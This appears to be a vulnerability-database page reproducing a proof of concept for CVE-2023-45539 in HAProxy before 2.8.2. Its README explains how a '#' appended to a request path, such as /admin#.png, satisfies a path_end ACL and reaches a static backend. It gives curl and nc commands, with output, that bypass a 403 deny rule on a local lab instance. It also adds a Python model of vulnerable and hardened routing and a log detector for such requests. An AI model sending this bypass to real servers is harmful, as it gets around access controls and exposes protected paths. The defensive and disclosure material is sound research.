Related vulnerability
Title:
HAProxy security vulnerability
(CVE-2023-45539)
Description: HAProxy is an open-source TCP/HTTP load-balancing server from the French company HAProxy. It provides layer-4 and layer-7 proxying, supports tens of thousands of connections, and is known for its efficiency and stability. HAProxy versions before 2.8.2 contain a security vulnerability that might allow a remote attacker to obtain sensitive information, or to cause other unspecified impact, through misinterpretation of a path_end rule.
Description
HAProxy-CVE-2023-45539-PoC
Introduction
# HAProxy-CVE-2023-45539-PoC
HAProxy before 2.8.2 accepts # as part of the URI component, which might allow remote attackers to obtain sensitive information or have unspecified other impact upon misinterpretation of a path_end rule, such as routing index.html#.png to a static server.
What gets misrouted in this CVE is not every extension that the backend app "supports": it is only the suffixes that HAProxy itself is configured to route with path_end (or regex) ACLs.
```bash
acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static
```
That means:
- HAProxy doesn't care whether the backend can actually serve .png, .js, etc.
- It only looks at the suffix match in the request path.
- If the suffix matches one of those strings, it routes to be_static.

So:
- `/admin#.png` → matches `.png` → goes to `be_static` → bypass
- `/admin#.asc` → doesn't match → stays in `be_app` → hits deny → 403
```bash
curl -i http://localhost:6655/public
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain
APP OK
```
```bash
curl -i http://localhost:6655/admin
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
```
## Bypass
```bash
printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain
STATIC OK (routed by path_end)
```
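To make the routing decision above concrete, here is an added Python model (not code from the PoC repository or from HAProxy) of how a `path_end` ACL evaluated on the raw request-target sends `/admin#.png` to `be_static`, how rejecting `#` before any ACL runs closes the bypass (matching the page's statement that 2.8.2 no longer accepts `#` in the URI), and a small detector for the trace such requests leave in HAProxy-style access logs. The `/admin` deny rule, the backend names and the log lines are assumptions, since the PoC's `haproxy.cfg` is not shown on the page.

```python
import re

# Suffixes taken from the page's "acl is_static path_end ..." line.
STATIC_SUFFIXES = (".png", ".jpg", ".gif", ".css", ".js")

def path_end_matches(request_target: str) -> bool:
    """Mimics 'acl is_static path_end ...' on a vulnerable HAProxy (< 2.8.2):
    the query string is cut at '?', but '#' is not treated specially, so the
    fragment stays inside the string the suffix test sees."""
    path = request_target.split("?", 1)[0]
    return any(path.endswith(s) for s in STATIC_SUFFIXES)

def route_vulnerable(request_target: str) -> tuple[int, str]:
    """Decision order described on the page: the path_end ACL picks be_static
    before be_app's deny rule is ever consulted. The deny rule on /admin is an
    assumption (the PoC's haproxy.cfg is not shown on the page)."""
    if path_end_matches(request_target):
        return 200, "be_static"
    if request_target.split("?", 1)[0].startswith("/admin"):
        return 403, "be_app"  # "Request forbidden by administrative rules."
    return 200, "be_app"

def route_hardened(request_target: str) -> tuple[int, str]:
    """Mitigation: reject any request-target containing '#' before ACLs run,
    so the fragment can never influence backend selection."""
    if "#" in request_target:
        return 400, "rejected"
    return route_vulnerable(request_target)

# Constructed HAProxy httplog-style lines (not real traffic) for the detector.
SAMPLE_LOG = """\
Dec  1 10:00:01 lb haproxy[12]: 10.0.0.5:51000 [01/Dec/2023:10:00:01.000] fe be_app/app1 0/0/1/2/3 200 120 - - ---- 1/1/0/0/0 0/0 "GET /public HTTP/1.1"
Dec  1 10:00:02 lb haproxy[12]: 10.0.0.5:51001 [01/Dec/2023:10:00:02.000] fe be_static/st1 0/0/1/2/3 200 140 - - ---- 1/1/0/0/0 0/0 "GET /admin#.png HTTP/1.1"
Dec  1 10:00:03 lb haproxy[12]: 10.0.0.5:51002 [01/Dec/2023:10:00:03.000] fe be_app/<NOSRV> 0/-1/-1/-1/0 403 93 - - PR-- 1/1/0/0/0 0/0 "GET /admin#.asc HTTP/1.1"
"""
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

def find_fragment_requests(log_text: str) -> list[tuple[str, str]]:
    """Returns (request-target, backend) for every logged request whose target
    carries '#', i.e. the pattern a path_end bypass attempt leaves in the logs."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if m and "#" in m.group("target"):
            backend = line.split()[8].split("/")[0]  # "backend/server" field
            hits.append((m.group("target"), backend))
    return hits
```

Because browsers and curl strip the fragment before sending, a `#` in a logged request-target is a strong signal of a hand-crafted request like the `nc` one above, and a `be_static` backend next to it shows the bypass actually worked.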
File snapshot
[4.0K] /data/pocs/b09ba236ae650d0e38650109e1db1eb1bce059e3
├── [ 192] docker-compose.yaml
├── [ 769] haproxy.cfg
└── [1.6K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the PoC via its original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.